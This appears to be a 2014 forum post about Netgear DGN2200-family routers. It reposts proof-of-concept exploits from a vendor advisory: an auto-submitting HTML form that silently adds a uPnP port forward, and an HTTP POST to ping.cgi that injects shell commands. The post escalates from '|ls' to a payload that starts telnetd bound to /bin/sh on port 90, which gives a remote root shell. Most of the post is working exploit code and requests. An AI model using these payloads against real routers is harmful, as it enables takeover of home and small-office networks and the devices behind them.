Netgear N300 DGN2200 uPnP CSRF?

[hkm]

4/26/2014 23:43:52 "How about uPnP CSRF?

Netgear N300 DGN2200
according to http://www.baesystemsdetica.com.au/Research/Advisories/NETGEAR-DGN2200-Multiple-Vulnerabilities-(AIS-2014
http://osvdb.org/103230

Netgear WNDR3400v3
according to http://disconnected.io/2014/03/18/how-i-hacked-your-router/
Netgear DG384v5
(tested myself)

PoC taken from the BAE report

<textarea id=""1"" name=""1"" width=""80"" height=""25""> hax3 0 192.168.0.1 1 8888 TCP 80 </textarea>

<input type=""submit"" >

<script>document.forms[0].submit();</script>

Secondly the BAE report for DGN2200 also has a command injection / CSRF for the ping diagnostic page, which worked great on my DG834Gv5. (I just used the Firefox debugger's Net tab, with ""Edit and Resend""). I quote:

Example exploitation to obtain a file and directory listing:

POST /ping.cgi HTTP/1.1
Host: 192.168.0.1
Proxy-Connection: keep-alive
Content-Length: 81
Cache-Control: max-age=0
Authorization: Basic YWRtaW46YXBwbGU3ODE=
Origin: http://192.168.0.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://192.168.0.1/DIAG_diag.htm
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-GB,en-US;q=0.8,en;q=0.6
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|ls

To get an interactive shell,

1. Send the following POST data:
   IPAddr1=a&IPAddr2=b&IPAddr3=c&IPAddr4=d&ping=xxxx&ping_IPAddr=|/usr/sbin/telnetd -p 90 -l /bin/sh
2. Telnet to port 90" Alan Jenkins [email protected]